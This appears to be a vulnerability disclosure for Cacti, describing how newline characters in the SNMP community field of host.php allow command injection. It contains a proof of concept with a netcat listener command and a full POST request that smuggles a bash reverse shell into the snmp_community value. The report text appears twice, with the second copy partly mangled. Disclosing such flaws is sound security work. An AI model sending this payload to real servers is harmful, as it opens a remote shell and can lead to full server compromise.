Summary
An input-validation flaw in the SNMP device configuration functionality.
An authenticated Cacti user can supply crafted SNMP community strings containing control characters (including newlines) that are accepted, stored verbatim in the database, and later embedded into backend SNMP operations.
In environments where downstream SNMP tooling or wrappers interpret newline-separated tokens as command boundaries, this can lead to unintended command execution with the privileges of the Cacti process.
Details
Cacti allows authenticated users to configure devices via: host.php?action=save
One of the fields, snmp_community, is intended to store the SNMP community string used for polling.
Input Handling
In host.php (device creation/editing), the SNMP community string is retrieved using:
get_nfilter_request_var('snmp_community');
This function performs no stripping of newline characters and does not validate shell metacharacters or command-separator characters.
The value is passed into api_device_save():
$save['snmp_community'] = form_input_validate(
$snmp_community,
'snmp_community',
'', // empty regex = no filtering
true,
3
);
Key points:
-
The sanitization regex is intentionally left empty (''), disabling validation.
-
Newline characters remain unmodified.
-
No escaping, truncation, or encoding is performed.
-
The input is subsequently committed to the database as part of the host table.
###Database Result
A crafted multi-line community string (for demonstration):
will be stored exactly as provided:
POC
1.start a listener nc -lvnp 4444
2. send a similar post request to create a new device
POST /cacti/host.php?header=false HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate, br
__csrf_magic=sid%3A3a2d0b3cddfb5912184b4b5130bb698650fc35d2%2C1764272981&description=aaa&hostname=127.0.0.1&location=&poller_id=1&site_id=1&host_template_id=0&device_threads=1&snmp_version=2&snmp_community=public%0abash%20-c%20'bash%20-i%20%3e%26%20%2fdev%2ftcp%2f127.0.0.1%2f4444%200%3e%261'%0a%23&snmp_security_level=authPriv&snmp_auth_protocol=MD5&snmp_username=&snmp_password=&snmp_password_confirm=&snmp_priv_protocol=DES&snmp_priv_passphrase=&snmp_priv_passphrase_confirm=&snmp_context=&snmp_engine_id=&snmp_port=161&snmp_timeout=500&max_oids=10&bulk_walk_size=0&availability_method=2&ping_method=1&ping_port=23&ping_timeout=400&ping_retries=1¬es=&external_id=&id=3&save_component_host=1&graph_template_id=297&snmp_query_id=2&reindex_method=1&action=save
- Trigger it by going to
Managment > Devices > aaa
SNMP logs:
Impact
Arbitrary commands may execute with the privileges of the Cacti process.
HussainFathy Reporter
Summary
An input-validation flaw in the SNMP device configuration functionality.
An authenticated Cacti user can supply crafted SNMP community strings containing control characters (including newlines) that are accepted, stored verbatim in the database, and later embedded into backend SNMP operations.
In environments where downstream SNMP tooling or wrappers interpret newline-separated tokens as command boundaries, this can lead to unintended command execution with the privileges of the Cacti process.
Details
Cacti allows authenticated users to configure devices via:
host.php?action=saveOne of the fields, snmp_community, is intended to store the SNMP community string used for polling.
Input Handling
In host.php (device creation/editing), the SNMP community string is retrieved using:
get_nfilter_request_var('snmp_community');This function performs no stripping of newline characters and does not validate shell metacharacters or command-separator characters.
The value is passed into api_device_save():
Key points:
The sanitization regex is intentionally left empty (''), disabling validation.
Newline characters remain unmodified.
No escaping, truncation, or encoding is performed.
The input is subsequently committed to the database as part of the host table.
###Database Result
A crafted multi-line community string (for demonstration):
will be stored exactly as provided:
POC
1.start a listener
nc -lvnp 44442. send a similar post request to create a new device
Managment>Devices>aaaSNMP logs:
Impact
Arbitrary commands may execute with the privileges of the Cacti process.
Under typical deployments, this can result in:
Unauthorized modification of monitoring data
Execution of system-level commands
Unauthorized file writes
Potential full compromise of the Cacti server